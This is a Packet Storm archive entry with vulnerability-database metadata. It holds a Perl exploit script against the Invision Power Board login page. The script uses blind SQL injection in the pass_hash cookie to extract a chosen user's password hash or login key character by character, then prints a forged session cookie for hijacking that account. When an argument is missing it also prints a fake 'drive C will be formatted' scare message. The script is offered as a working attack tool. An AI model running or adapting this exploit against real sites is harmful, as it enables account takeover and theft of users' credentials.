ID PACKETSTORM:37324 Type packetstorm Reporter Tony Little Lately Modified 2005-05-27T00:00:00
Description
`#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "The type of the file system is NTFS.\n\n";
print "WARNING, ALL DATA ON NON-REMOVABLE DISK\n";
print "DRIVE C: WILL BE LOST!\n";
print "Proceed with Format (Y/N)?\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '<title>(.*)Log In(.*)</title>';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
`
{"sourceHref": "https://packetstormsecurity.com/files/download/37324/invision203Login.pl.txt", "sourceData": "`#!/usr/bin/perl -w \n################################################################## \n# This one actually works :) Just paste the outputted cookie into \n# your request header using livehttpheaders or something and you \n# will probably be logged in as that user. No need to decrypt it! \n# Exploit coded by \"Tony Little Lately\" and \"Petey Beege\" \n################################################################## \n \nuse LWP::UserAgent; \n \n$ua = new LWP::UserAgent; \n$ua->agent(\"Mosiac 1.0\" . $ua->agent); \n \nif (!$ARGV[0]) {$ARGV[0] = '';} \nif (!$ARGV[3]) {$ARGV[3] = '';} \n \nmy $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; \nmy $user = $ARGV[1]; # userid to jack \nmy $iver = $ARGV[2]; # version 1 or 2 \nmy $cpre = $ARGV[3]; # cookie prefix \nmy $dbug = $ARGV[4]; # debug? \n \nif (!$ARGV[2]) \n{ \nprint \"The type of the file system is NTFS.\\n\\n\"; \nprint \"WARNING, ALL DATA ON NON-REMOVABLE DISK\\n\"; \nprint \"DRIVE C: WILL BE LOST!\\n\"; \nprint \"Proceed with Format (Y/N)?\\n\"; \nexit; \n} \n \nmy @charset = (\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"a\",\"b\",\"c\",\"d\",\"e\",\"f\"); \n \nmy $outputs = ''; \n \nfor( $i=1; $i < 33; $i++ ) \n{ \nfor( $j=0; $j < 16; $j++ ) \n{ \nmy $current = $charset[$j]; \nmy $sql = ( $iver < 2 ) ? \"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*\" : \n\"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*\"; \nmy @cookie = ('Cookie' => $cpre . \"member_id=31337420; \" . $cpre . \"pass_hash=\" . $sql); \nmy $res = $ua->get($path, @cookie); \n \n# If we get a valid sql request then this \n# does not appear anywhere in the sources \n$pattern = '<title>(.*)Log In(.*)</title>'; \n \n$_ = $res->content; \n \nif ($dbug) { print }; \n \nif ( !(/$pattern/) ) \n{ \n$outputs .= $current; \nprint \"$current\\n\"; \nlast; \n} \n \n} \nif ( length($outputs) < 1 ) { print \"Not Exploitable!\\n\"; exit; } \n} \nprint \"Cookie: \" . $cpre . \"member_id=\" . $user . \";\" . $cpre . \"pass_hash=\" . $outputs; \nexit; \n \n \n`\n", "edition": 1, "references": [], "modified": "2005-05-27T00:00:00", "hash": "a1ace311f6dbfc39f97813408a8e90d36184a46a07101bc589f927a1fafb877d", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/37324/invision203Login.pl.txt.html", "description": "", "id": "PACKETSTORM:37324", "reporter": "Tony Little Lately", "lastseen": "2016-11-03T10:18:51", "published": "2005-05-27T00:00:00", "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:51"}, "vulnersScore": 10.0}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "invision203Login.pl.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "71be367c061d9be65ebeb37780c76684", "key": "href"}, {"hash": "3b7549bfb389996cb24206db33fae590", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "3b7549bfb389996cb24206db33fae590", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7dbbcba6c7f488695cdadefabae6c4bc", "key": "reporter"}, {"hash": "5c1bd7e11ccd21e424ead1019eaad2cc", "key": "sourceData"}, {"hash": "0b0ce071c11033b3aff90cb41d2de2ce", "key": "sourceHref"}, {"hash": "b30752604c5d00d245b7d2b8c9356e9f", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
